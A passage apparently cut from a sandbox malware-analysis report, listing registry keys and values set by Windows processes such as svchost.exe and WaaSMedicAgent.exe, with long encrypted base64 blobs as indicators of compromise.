1ce2121e52af3faac335a295e5dd3b5e2a75702fc7e8b5789c6d9c068a51356b525a951ef3d908cdf9094a16b655ac9a82f89ffb3a4573fc61a5d1d9baebaa776dd8a07ae77c2eeedba830b748aba4383184983ba891cb6ae9711bc186bbafe68e69c844d73b7d9a9b0da156d7e2030c812f599ba12a1de0460260432f8fbc93ca1dac6745221c8dc3bbee1704a84663067750994778652fcd605e06b51a93273d30e27f847e8ae408018454addccf4ba6634ff3efdc848733d973180cc2ea20b3172cd0d56b60ba225e4b1658416134dd283b722bf7604145f0d308c920373a76992a3ab48fe5cc50d76764b99fe834a5bdc2a54c9a325cb35cbd6bd702e2400000007d5efd22d945438ec58214b2d1c4fb770c1cb1734e5dc26fa2e687b473620bf614726b0b1b40303739be7e610163c83b77bc6332ac8c238bbc70ec9ff998f3ce	mousocoreworker.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02hffkmccggumxty\Request Tuesday, December 03, 2024 09:46:56 = "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"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3350944739-639801879-157714471-1000\ValidDeviceId	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	WaaSMedicAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3350944739-639801879-157714471-1000\02hffkmccggumxty\AppIdList	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	WaaSMedicAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3350944739-639801879-157714471-1000\02zffscyanttqogt\AppIdList = "{AFDA72BF-3409-413A-B54E-2AB8D66A7826};"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1"	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 03 Dec 2024 09:48:21 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	WaaSMedicAgent.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1733219299"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	WaaSMedicAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3350944739-639801879-157714471-1000\02zffscyanttqogt\DeviceId = "<Data><User username=\"02ZFFSCYANTTQOGT\"/></Data>\r\n"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	WaaSMedicAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3350944739-639801879-157714471-1000\02zffscyanttqogt\DeviceId = "<Data><User username=\"02ZFFSCYANTTQOGT\"><HardwareInfo BoundTime=\"1733219218\" TpmKeyStateClient=\"0\" TpmKeyStateServer=\"0\" LicenseInstallError=\"0\"/></User></Data>\r\n"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager	mousocoreworker.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\ValidDeviceId = "02oqduuijzvltxfy"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	WaaSMedicAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02oqduuijzvltxfy	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02oqduuijzvltxfy\DeviceId = "<Data LastUpdatedTime=\"1733219212\"><User username=\"02OQDUUIJZVLTXFY\"/></Data>\r\n"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02oqduuijzvltxfy\Provision Tuesday, December 03, 2024 09:46:51 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAATEsmPOMyVkOonVeptikfaAAAAAACAAAAAAAQZgAAAAEAACAAAABQWM2EVyl0UfHLeXt5+H13VBdR3Iht7uUWQ1yOc3YlVgAAAAAOgAAAAAIAACAAAADlyIxeIdfUS/EfRmG1mZ8dcriALonI8FKy+RW0V6ZLXSAAAACexghV2f8ruP6wDEJdS5mm5BETMl7+OMsS1yx8+IRaHkAAAABsl2zTFiS09jzE7HEKSmkn1uXixHDv8bYs2M2FoH9+/YHffcQhYm+2C0K2sWujhj6dVAhyfB30Bzy3P4/XKfdb"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "00184011ADE07956"	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	WaaSMedicAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02hffkmccggumxty\Response Tuesday, December 03, 2024 09:46:56 = "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"	svchost.exe

Modifies registry class 27 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = ffffffff	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 5a003100000000008359d74d100053797374656d33320000420009000400efbe874f77488359d74d2e000000b90c0000000001000000000000000000000000000000dafa0201530079007300740065006d0033003200000018000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 56003100000000004759134c100057696e646f777300400009000400efbe874f77488359d84d2e0000000006000000000100000000000000000000000000000095564900570069006e0064006f0077007300000016000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	Explorer.EXE
